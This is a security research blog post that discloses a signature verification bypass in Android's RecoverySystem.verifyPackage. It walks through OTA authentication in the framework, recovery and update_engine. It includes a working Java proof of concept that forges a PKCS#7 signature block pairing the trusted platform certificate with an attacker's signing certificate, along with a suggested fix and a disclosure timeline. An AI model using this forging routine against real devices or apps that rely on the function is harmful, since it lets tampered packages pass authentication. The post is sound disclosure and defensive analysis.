A signature verification bypass in a function that verifies the integrity of ZIP archives in the AOSP framework

Introduction

In this post, we will explore how OTA package authentication works in Android. We will not go into the full details of the update process, as it is quite complex. Instead, we will focus on gaining a high-level understanding of the key system components involved and where the authentication takes place.

First, the update client has to download the update package, which can be either legacy or AB (taking advantage of the AB partition mechanism). AB packages may or may not be streamable, but the authentication works the same way. In both cases, the package downloaded by the update client is a signed ZIP archive with the signature block in the comment section, and the OTA client must first authenticate it using RecoverySystem.verifyPackage before extracting and parsing its metadata.

If the OTA is a legacy non-AB OTA package (and the device supports it), the client can simply call RecoverySystem.installPackage to hand it over to the recovery via a parameter in the Bootloader Control Block (BCB) and reboot. If the OTA is an AB OTA package (and the device supports it), the client must query the update_engine service through an API, defined in the corresponding Android Interface Definition Language (AIDL) file, to first allocate space for the update (IUpdateEngine.allocateSpaceForPayload) and then apply it (IUpdateEngine.applyPayload) to the available AB slot.
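
As an illustration of the legacy flow, here is a minimal sketch of a client using the RecoverySystem API mentioned above. The class name, file handling, and error handling are ours, the AB path through IUpdateEngine is omitted since it goes through a system AIDL interface, and installPackage requires privileged permissions:

import android.content.Context;
import android.os.RecoverySystem;
import java.io.File;

public class LegacyOtaClientSketch {
    // Hypothetical helper: verify a downloaded package, then hand it to the recovery.
    public static void applyLegacyOta(Context context, File packageFile) throws Exception {
        // First line of defense: check the package signature against the platform's
        // trusted OTA certificates (the default keystore, /system/etc/security/otacerts.zip).
        RecoverySystem.verifyPackage(packageFile, null /* ProgressListener */, null /* default keystore */);

        // Write the package path to the Bootloader Control Block and reboot into
        // recovery, which verifies the package again before installing it.
        RecoverySystem.installPackage(context, packageFile);
    }
}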

GmsCore is one such client on devices that use Google Play Services, and it follows these guidelines. Each OEM firmware has to implement some variation of this process.

We suggest checking the Android documentation for the details.

VerifyPackage

The function android.os.RecoverySystem.verifyPackage, whose purpose is to verify the integrity of a ZIP archive, was intended to perform a first verification of an update package before handing it either to the recovery or to the update_engine, which would verify it again.

This function checks that the ZIP archive contains a DER-encoded signature block in the comment section, that the archive content (excluding the comment section) matches the digest in the signature block, and that the signing certificate is trusted by the platform. The issue is that the function verifies that the block contains a trusted certificate, but not that this certificate is the one actually used for signing. This weakness can be exploited to reliably craft signature blocks that pass this verification without knowing the private key associated with the trusted certificate.

In this first snippet, we see that the signature block is parsed using sun.security.pkcs.PKCS7 and that signatureKey comes from the first certificate of the block (certificates[0]). This key is compared to the trusted certificates' public keys, and an exception is thrown if none match.

// Parse the signature
PKCS7 block =
    new PKCS7(new ByteArrayInputStream(eocd, commentSize+22-signatureStart, signatureStart));

// Take the first certificate from the signature (packages
// should contain only one).
X509Certificate[] certificates = block.getCertificates();
if (certificates == null || certificates.length == 0) {
    throw new SignatureException("signature contains no certificates");
}
X509Certificate cert = certificates[0];
PublicKey signatureKey = cert.getPublicKey();

SignerInfo[] signerInfos = block.getSignerInfos();
if (signerInfos == null || signerInfos.length == 0) {
    throw new SignatureException("signature contains no signedData");
}
SignerInfo signerInfo = signerInfos[0];

// Check that the public key of the certificate contained
// in the package equals one of our trusted public keys.
boolean verified = false;
HashSet<X509Certificate> trusted = getTrustedCerts(
    deviceCertsZipFile == null ? DEFAULT_KEYSTORE : deviceCertsZipFile);
for (X509Certificate c : trusted) {
    if (c.getPublicKey().equals(signatureKey)) {
        verified = true;
        break;
    }
}
if (!verified) {
    throw new SignatureException("signature doesn't match any trusted key");
}

However, we will see that the assumption that "packages should contain only one certificate" is wrong and that the signing certificate doesn't necessarily have to be the first one. Here, the function calls block.verify, which performs the signature and integrity checks.

SignerInfo verifyResult = block.verify(signerInfo, new InputStream() {
    // The signature covers all of the OTA package except the
    // archive comment and its 2-byte length.
    long toRead = fileLen - commentSize - 2;
    long soFar = 0;

    int lastPercent = 0;
    long lastPublishTime = startTimeMillis;

    @Override
    public int read() throws IOException {
        throw new UnsupportedOperationException();
    }

    @Override
    public int read(byte[] b, int off, int len) throws IOException {
        if (soFar >= toRead) {
            return -1;
        }
        if (Thread.currentThread().isInterrupted()) {
            return -1;
        }

        int size = len;
        if (soFar + size > toRead) {
            size = (int)(toRead - soFar);
        }
        int read = raf.read(b, off, size);
        soFar += read;

        if (listenerForInner != null) {
            long now = System.currentTimeMillis();
            int p = (int)(soFar * 100 / toRead);
            if (p > lastPercent &&
                now - lastPublishTime > PUBLISH_PROGRESS_INTERVAL_MS) {
                lastPercent = p;
                lastPublishTime = now;
                listenerForInner.onProgress(lastPercent);
            }
        }

        return read;
    }
});

The libcore implementation of SignerInfo's verify function recovers the signing certificate from the block with getCertificate, using the serial number and issuer. getCertificate iterates over the certificates contained in the block to find the matching one, meaning the signing certificate can be in any position for verify to succeed.

X509Certificate cert = getCertificate(block);
if (cert == null) {
    return null;
}
PublicKey key = cert.getPublicKey();
Signature sig = Signature.getInstance(algname);
sig.initVerify(key);
public X509Certificate getCertificate(PKCS7 block)
    throws IOException
{
    return block.getCertificate(certificateSerialNumber, issuerName);
}
public X509Certificate getCertificate(BigInteger serial, X500Name issuerName) {
    if (certificates != null) {
        if (certIssuerNames == null)
            populateCertIssuerNames();
        for (int i = 0; i < certificates.length; i++) {
            X509Certificate cert = certificates[i];
            BigInteger thisSerial = cert.getSerialNumber();
            if (serial.equals(thisSerial)
                && issuerName.equals(certIssuerNames[i]))
            {
                return cert;
            }
        }
    }
    return null;
}

Finally, the block's certificate section is an ASN.1 SET OF that can indeed contain multiple objects: nothing in the libcore parser prevents it, and no constraint is placed on the additional certificates (such as being part of the signing certificate's chain).

Here is an example of code producing a signed package using the same implementation. When the block is encoded, the certificates in the SET OF are sorted, and the first distinguishing field in the encoded certificate is its content size. So, to make sure the signing certificate ends up second (with the expected platform certificate first), give it a very large subject.

public static byte[] sign(byte[] data) {
    if (data == null) {
        data = Base64.getDecoder().decode(ZIP_DATA);
    }
    try {
        Class<?> pkcs7Class = Sign.class.getClassLoader().loadClass("sun.security.pkcs.PKCS7");
        Class<?> contentInfoClass = Sign.class.getClassLoader().loadClass("sun.security.pkcs.ContentInfo");
        Class<?> objIdClass = Sign.class.getClassLoader().loadClass("sun.security.util.ObjectIdentifier");
        Class<?> derValClass = Sign.class.getClassLoader().loadClass("sun.security.util.DerValue");
        Class<?> signerInfoClass = Sign.class.getClassLoader().loadClass("sun.security.pkcs.SignerInfo");
        Class<?> algIdClass = Sign.class.getClassLoader().loadClass("sun.security.x509.AlgorithmId");
        Class<?> x500NameClass = Sign.class.getClassLoader().loadClass("sun.security.x509.X500Name");

        X509Certificate platform = getCertificate(PLATFORM_CERT);
        X509Certificate signing = getCertificate(SIGNING_CERT);
        PrivateKey key = getPrivateKey(SIGNING_KEY);

        byte[] toSign = Arrays.copyOfRange(data, 0, data.length - 2);
        byte[] signature = null;

        try {
            Signature privateSignature = Signature.getInstance("SHA256withRSA");
            privateSignature.initSign(key);
            privateSignature.update(toSign);
            signature = privateSignature.sign();
        } catch (Exception e) {
            Log.e(TAG, "exception", e);
        }

        Object hashAlg = algIdClass.getMethod("get", String.class).invoke(null, "SHA-256");
        Object encAlg = algIdClass.getMethod("get", String.class).invoke(null, "RSA");
        Object issuer = x500NameClass.getConstructor(String.class).newInstance(signing.getIssuerX500Principal().getName());
        Object serial = signing.getSerialNumber();
        Object signer = signerInfoClass.getConstructor(x500NameClass, BigInteger.class, algIdClass, algIdClass, byte[].class).newInstance(issuer, serial, hashAlg, encAlg, signature);

        int[] sdata = {1, 2, 840, 113549, 1, 7, 2};
        Object contentInfo = contentInfoClass.getConstructor(objIdClass, derValClass).newInstance(objIdClass.getMethod("newInternal", sdata.getClass()).invoke(null, sdata), null);
        Object digestAlgIds = Array.newInstance(algIdClass, 1);
        Array.set(digestAlgIds, 0, hashAlg);
        // Both the trusted platform certificate and our signing certificate go into the block.
        X509Certificate[] certs = new X509Certificate[]{platform, signing};
        X509CRL[] crls = new X509CRL[]{};
        Object signers = Array.newInstance(signerInfoClass, 1);
        Array.set(signers, 0, signer);

        Object pkcs = pkcs7Class.getConstructor(digestAlgIds.getClass(), contentInfo.getClass(), certs.getClass(), crls.getClass(), signers.getClass()).newInstance(digestAlgIds, contentInfo, certs, null, signers);

        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        pkcs7Class.getMethod("encodeSignedData", OutputStream.class).invoke(pkcs, baos);

        byte[] sigBlock = baos.toByteArray();

        int commentSize = sigBlock.length + 6;
        int sigStart = commentSize;
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        out.write(toSign);
        out.write(new byte[]{(byte)(commentSize & 0xff), (byte)((commentSize >> 8) & 0xff)});
        out.write(sigBlock);
        out.write(new byte[]{(byte)(sigStart & 0xff), (byte)((sigStart >> 8) & 0xff), (byte) 0xff, (byte) 0xff, (byte)(commentSize & 0xff), (byte)((commentSize >> 8) & 0xff)});

        byte[] bytes = out.toByteArray();
        Log.e(TAG, "Block size: " + String.valueOf(sigBlock.length));
        Object test = pkcs7Class.getConstructor(bytes.getClass()).newInstance(sigBlock);
        certs = (X509Certificate[]) pkcs7Class.getMethod("getCertificates").invoke(test);
        Log.e(TAG, "Certs match: " + String.valueOf(certs[0].equals(platform)));

        return bytes;
    } catch (Exception e) {
        Log.e(TAG, "exception", e);
    }
    return null;
}
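
The root cause is thus that the trusted-key comparison is performed on certificates[0] rather than on the certificate the SignerInfo actually designates. Below is a minimal sketch of a stricter check, reusing the block, signerInfo, and trusted variables from the first snippet; this is our illustration of one possible hardening, not the actual AOSP code:

// Resolve the certificate the SignerInfo refers to (by serial number and issuer),
// exactly as block.verify does, and compare that key against the trusted set.
X509Certificate signerCert = signerInfo.getCertificate(block);
if (signerCert == null) {
    throw new SignatureException("signer certificate not found in block");
}

boolean trustedSigner = false;
for (X509Certificate c : trusted) {
    if (c.getPublicKey().equals(signerCert.getPublicKey())) {
        trustedSigner = true;
        break;
    }
}
if (!trustedSigner) {
    throw new SignatureException("signing certificate doesn't match any trusted key");
}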

Authentication in the recovery

The authentication of the package in the recovery works much the same as RecoverySystem.verifyPackage, since the package is handed over as-is by the client. The work is done in the verify_file function, called by VerifyAndInstallPackage right at the beginning of the install process.

This function recovers the 6-byte footer at the end of the archive (in the comment section) and uses it to find the EOCD, located at file length - (comment size + 22). The footer layout is:

signature block offset (2 bytes, little endian) || 0xff 0xff || comment size (2 bytes, little endian)

First, it verifies that the EOCD is really there by comparing the first 4 bytes with the EOCD magic, and checks that there is no other EOCD magic after it in the file. This is very important because the package is later handled with libziparchive, which locates the EOCD by searching for the magic backward from the end of the file. Without this check, one could have the footer point to a fake EOCD record hidden in a file entry, leading the authentication process to authenticate only part of the file (up to the fake record) and allowing an attacker to append content to a legitimate package.

Then, it calculates a SHA-1 and a SHA-256 hash of the full content of the archive (excluding the comment section and its size). The encrypted hash is extracted from the signature block using a minimalistic ASN.1 parser. This sound and simple parser only cares about the first SignerInfo entry, consumes data one byte at a time, and verifies sizes at each step of the way.

Finally, it iterates over the platform public keys and calls libssl's RSA_verify/ECDSA_verify with the calculated hash, the encrypted hash from the signature block, and the trusted key. The verification succeeds only if one of the trusted keys can public-decrypt the signature and the result matches the calculated hash.

All in all, despite having the same aim, the recovery implementation of the authentication doesn't share the shortcomings of the implementation in the Android framework, and legacy OTA packages exploiting the vulnerability would be stopped there without doing any damage. The PKCS#7 structure expected by the minimalistic parser is documented in the recovery source:

Simple version of PKCS#7 SignedData extraction. This extracts the
signature OCTET STRING to be used for signature verification.

For full details, see http://www.ietf.org/rfc/rfc3852.txt

The PKCS#7 structure looks like:

  SEQUENCE (ContentInfo)
    OID (ContentType)
    [0] (content)
      SEQUENCE (SignedData)
        INTEGER (version CMSVersion)
        SET (DigestAlgorithmIdentifiers)
        SEQUENCE (EncapsulatedContentInfo)
        [0] (CertificateSet OPTIONAL)
        [1] (RevocationInfoChoices OPTIONAL)
        SET (SignerInfos)
          SEQUENCE (SignerInfo)
            INTEGER (CMSVersion)
            SEQUENCE (SignerIdentifier)
            SEQUENCE (DigestAlgorithmIdentifier)
            SEQUENCE (SignatureAlgorithmIdentifier)
            OCTET STRING (SignatureValue)
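
To make the 6-byte footer layout described above concrete, here is a hedged sketch of how a verifier can locate the EOCD and the signature block from it. This is our own Java illustration (the recovery code is C++), the class and method names are hypothetical, and the additional checks discussed above (EOCD magic, absence of a second EOCD, hash comparison) are omitted:

import java.io.IOException;
import java.io.RandomAccessFile;

public class FooterSketch {
    public static void locateSignature(RandomAccessFile raf) throws IOException {
        long fileLen = raf.length();

        // Read the 6-byte footer at the very end of the archive comment.
        byte[] footer = new byte[6];
        raf.seek(fileLen - 6);
        raf.readFully(footer);

        // Bytes 2 and 3 must be 0xff 0xff, otherwise there is no signature footer.
        if (footer[2] != (byte) 0xff || footer[3] != (byte) 0xff) {
            throw new IOException("no signature in file (no footer marker)");
        }

        // Both values are little-endian, as described above.
        int signatureStart = (footer[0] & 0xff) | ((footer[1] & 0xff) << 8); // offset from end of file
        int commentSize = (footer[4] & 0xff) | ((footer[5] & 0xff) << 8);

        // The 22-byte EOCD record sits right before the comment.
        long eocdOffset = fileLen - commentSize - 22;
        // The signature block occupies the last signatureStart bytes of the file.
        long signatureBlockOffset = fileLen - signatureStart;

        System.out.println("EOCD at " + eocdOffset
                + ", signature block at " + signatureBlockOffset);
    }
}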

Authentication in update_engine

The authentication of AB OTA packages in update_engine works quite differently. The update client extracts a binary payload from the archive, and it is this payload that is handed to the update_engine (in the case of a streamed update, the update_engine can also download it directly). The payload is composed of a signed metadata section at the start, followed by the operations data.

The metadata section starts with a few header values:

{'C', 'r', 'A', 'U'} (4 bytes) || version (8 bytes) || manifest size (8 bytes) || signature size (4 bytes)

This is followed by the manifest and the signature block.

The authentication happens in the DeltaPerformer::Write function. It first reads the header values (PayloadMetadata::ParsePayloadHeader) and verifies them (the magic is present, the metadata size doesn't exceed the payload size, etc.). It then verifies the signature (PayloadMetadata::ValidateMetadataSignature): the signature block is read, the payload metadata up to the beginning of the signature block is hashed with SHA-256 (this includes the headers and the manifest), and both the hash and the signature data are handed to PayloadVerifier::VerifySignature. The signature block, which is a protobuf message, is parsed:

message Signatures {
  message Signature {
    optional uint32 version = 1 [deprecated = true];
    optional bytes data = 2;

    // The DER encoded signature size of EC keys is nondeterministic for
    // different input of sha256 hash. However, we need the size of the
    // serialized signatures protobuf string to be fixed before signing;
    // because this size is part of the content to be signed. Therefore, we
    // always pad the signature data to the maximum possible signature size of
    // a given key. And the payload verifier will truncate the signature to
    // its correct size based on the value of |unpadded_signature_size|.
    optional fixed32 unpadded_signature_size = 3;
  }
  repeated Signature signatures = 1;
}
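
To make the payload header layout described above concrete, here is a hedged sketch of a parser for it. This is our own Java illustration (update_engine's actual parsing lives in PayloadMetadata::ParsePayloadHeader, in C++); the class and method names are hypothetical and we assume big-endian header fields:

import java.io.DataInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.Arrays;

public class PayloadHeaderSketch {
    public static void parseHeader(InputStream in) throws IOException {
        // DataInputStream reads multi-byte integers in big-endian order.
        DataInputStream dis = new DataInputStream(in);

        byte[] magic = new byte[4];
        dis.readFully(magic);
        if (!Arrays.equals(magic, new byte[]{'C', 'r', 'A', 'U'})) {
            throw new IOException("bad payload magic");
        }

        long version = dis.readLong();      // file format version (8 bytes)
        long manifestSize = dis.readLong(); // manifest size (8 bytes)
        int signatureSize = dis.readInt();  // metadata signature size (4 bytes)

        // The manifest (a protobuf) and the metadata signature block follow.
        // Everything up to the start of the signature block is what gets hashed
        // with SHA-256 for ValidateMetadataSignature.
        System.out.println("version=" + version + " manifestSize=" + manifestSize
                + " metadataSignatureSize=" + signatureSize);
    }
}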

The signature verification itself is a bit unusual. For each signature in the block (or until one verifies), instead of using RSA_verify, the signature data is put through RSA_public_decrypt with the candidate platform public key, and the result is compared to the "manually" PKCS1-v1.5 padded calculated hash. This only happens for RSA platform keys; for EC keys, ECDSA_verify is used. This looks fine nonetheless. If the signature verification succeeds, the manifest (also a protobuf message) is parsed and the installation proceeds. The manifest contains the list of operations to perform on the partitions to update. These operations can require data from the data part of the payload, and in that case, this data is verified against a SHA-256 hash in the signed manifest (one per operation).
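
The padded-hash comparison described above can be illustrated with a hedged sketch, transposed to Java (the real code is C++ calling RSA_public_decrypt). The class, method, and constant names are ours, and this is only meant to show the idea, not to mirror PayloadVerifier exactly:

import java.security.MessageDigest;
import java.security.interfaces.RSAPublicKey;
import java.util.Arrays;
import javax.crypto.Cipher;

public class PaddedHashCompareSketch {
    // Standard ASN.1 DigestInfo prefix for SHA-256 (see RFC 8017, section 9.2).
    private static final byte[] SHA256_DIGEST_INFO_PREFIX = {
        0x30, 0x31, 0x30, 0x0d, 0x06, 0x09, 0x60, (byte) 0x86, 0x48, 0x01,
        0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x04, 0x20
    };

    public static boolean verify(byte[] signature, byte[] metadata, RSAPublicKey key) throws Exception {
        // "Public-decrypt" the signature: raw RSA with the public key, no padding handling.
        Cipher rsa = Cipher.getInstance("RSA/ECB/NoPadding");
        rsa.init(Cipher.ENCRYPT_MODE, key);
        byte[] recovered = rsa.doFinal(signature); // zero-padded to the modulus length

        // Manually build the expected EMSA-PKCS1-v1_5 block:
        // 0x00 0x01 0xff .. 0xff 0x00 || DigestInfo || SHA-256(metadata)
        byte[] hash = MessageDigest.getInstance("SHA-256").digest(metadata);
        int k = (key.getModulus().bitLength() + 7) / 8;
        byte[] expected = new byte[k];
        expected[0] = 0x00;
        expected[1] = 0x01;
        int psLen = k - 3 - SHA256_DIGEST_INFO_PREFIX.length - hash.length;
        Arrays.fill(expected, 2, 2 + psLen, (byte) 0xff);
        expected[2 + psLen] = 0x00;
        System.arraycopy(SHA256_DIGEST_INFO_PREFIX, 0, expected, 3 + psLen, SHA256_DIGEST_INFO_PREFIX.length);
        System.arraycopy(hash, 0, expected, 3 + psLen + SHA256_DIGEST_INFO_PREFIX.length, hash.length);

        // The signature is accepted only if the recovered block matches the expected one exactly.
        return Arrays.equals(recovered, expected);
    }
}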

The payload is duly authenticated, but GmsCore extracts another file from the original package, the care_map. This is yet another protobuf message, and this one is not authenticated. It is used by the update_verifier when the device reboots and contains a bunch of block ranges.

One last thing about the update_engine: the update process doesn't seem to be interrupted upon an authentication/integrity verification failure if ro.secure is 0. We mention it here because third-party and rooted ROM providers might want to have a look.

  install_plan_.hash_checks_mandatory = hardware_->IsOfficialBuild();
  if (*error != ErrorCode::kSuccess) {
    if (install_plan_->hash_checks_mandatory) {
      // The autoupdate_CatchBadSignatures test checks for this string
      // in log-files. Keep in sync.
      LOG(ERROR) << "Mandatory metadata signature validation failed";
      return MetadataParseResult::kError;
    }

    // For non-mandatory cases, just send a UMA stat.
    LOG(WARNING) << "Ignoring metadata signature validation failures";
    *error = ErrorCode::kSuccess;
  }

Conclusion

The consequences of a failure to properly authenticate an OTA package could be dire, ranging from patching a partition not protected by AVB/verity to enabling remote code execution via post-install scripts. Although the vulnerability in verifyPackage may not seem like a major issue—assuming OEM firmware OTA clients are correctly implemented—a malicious package can still pass the first line of defense before being blocked by the recovery or the update_engine.

However, some OEM and third-party applications have used verifyPackage in the past to authenticate other types of packages—such as bundles of APKs, configuration files, and more—and that may still be the case today. Note that this function has probably always been vulnerable, and it remains so today.

Disclosure Timeline

We reported this vulnerability to Google. Below is a timeline of the relevant events during the coordinated vulnerability disclosure process, included to provide transparency about the process and our actions.

  • 2024-01-18 Quarkslab reported the vulnerability in Google's bug tracker.
  • 2024-01-19 Vulnerability acknowledged by Google. They asked for further information about disclosure.
  • 2024-01-19 Quarkslab explained that the bug was found during a security assessment for a customer, so it was already known to that customer, although under NDA.
  • 2024-01-22 Google requested a complete but minimal PoC which reproduces the issue on the latest Android U build.
  • 2024-02-05 Quarkslab provided a PoC to Google.
  • 2024-02-06 Google acknowledged the PoC and indicated that they would be following their standard investigation and remediation process.
  • 2024-02-14 Google requested additional information.
  • 2024-02-19 Quarkslab sent step-by-step instructions to reproduce the bug.
  • 2024-02-20 Quarkslab sent further details including device fingerprint of an exploited device and logcat output.
  • 2024-02-20 Google acknowledged the data sent and indicated that they would be following their standard investigation and remediation process.
  • 2024-03-08 Quarkslab asked for an update.
  • 2024-03-08 Google said they did not have an update at the moment.
  • 2025-03-12 Google indicated the vulnerability was rated as Moderate severity. They indicated that, as moderate severity vulnerabilities are typically addressed in a potential upcoming release, they were closing the report and were not going to provide further updates.
  • 2025-03-21 Google set the Status field of the bug entry in the bug tracker as "Won't Fix (Infeasible)".
  • 2025-04-08 This blog post was published.

If you would like to learn more about our security audits and explore how we can help you, get in touch with us!